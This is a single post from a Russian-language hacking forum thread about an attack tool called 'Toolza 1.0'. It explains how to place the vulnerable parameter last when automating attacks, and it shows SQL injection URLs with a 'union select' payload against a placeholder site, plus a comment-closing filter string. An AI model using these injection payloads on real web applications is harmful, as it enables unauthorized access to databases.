Тема: Toolza 1.0
Показать сообщение отдельно

  #241  
Старый 04.05.2010, 03:44
Аватар для YuNi|[c
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

ну я просто поменяю местами параметры и поставлю в конец уязвимый параметр и всё ))

при твоем условиии так
www.pupkin.com/index.php?param2=13&param1=1+union+select+1,2,3--+

пашет как на
www.pupkin.com/index.php?param1=1+union+select+1,2,3--+&param2=13

но удобно автоматизировать, так как если там много параметров по с примером пашкелы будет длинный коммент типа:
$filtr_c = "--+&param2=13&param2=1543&param3=43&param5=545&param 6=132342&param7=54&param8=13"; # close SQL
 
Ответить с цитированием